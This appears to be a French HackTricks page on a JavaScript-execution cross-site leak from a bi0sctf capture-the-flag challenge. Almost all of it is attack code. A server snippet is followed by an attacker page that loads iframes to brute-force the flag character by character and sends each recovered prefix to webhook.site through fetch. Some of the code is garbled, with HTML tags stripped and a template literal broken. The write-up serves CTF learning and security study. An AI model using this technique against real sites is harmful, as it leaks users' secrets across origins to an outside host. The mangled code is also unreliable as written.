JavaScript Execution XS Leak

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

```javascript // Code that will try ${guess} as flag (need rest of the server code app.get('/guessing', function(req, res) { let guess = req.query.guess let page = ` function foo() { // If not the flag this will be executed window.parent.foo() }

hello2

` res.send(page) }); ``` Page principale qui génère des iframes vers la page précédente `/guessing` pour tester chaque possibilité ```html let candidateIsGood = false; let candidate = '' let flag = 'bi0sctf{' let guessIndex = -1 let flagChars = '_0123456789abcdefghijklmnopqrstuvwxyz}ABCDEFGHIJKLMNOPQRSTUVWXYZ'

// this will get called from our iframe IF the candidate is WRONG function foo() { candidateIsGood = false }

timerId = setInterval(() => { if (candidateIsGood) { flag = candidate guessIndex = -1 fetch('https://webhook.site/?flag='+flag) }

//Start with true and will be change to false if wrong candidateIsGood = true guessIndex++ if (guessIndex >= flagChars.length) { fetch('https://webhook.site/') return } let guess = flagChars[guessIndex] candidate = flag + guess let iframe = <iframe src="/guessing?guess=${encodeURIComponent(candidate)}"></iframe> console.log('iframe: ', iframe) hack.innerHTML = iframe } , 500);

hello

```

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge AWS de HackTricks)!

Last updated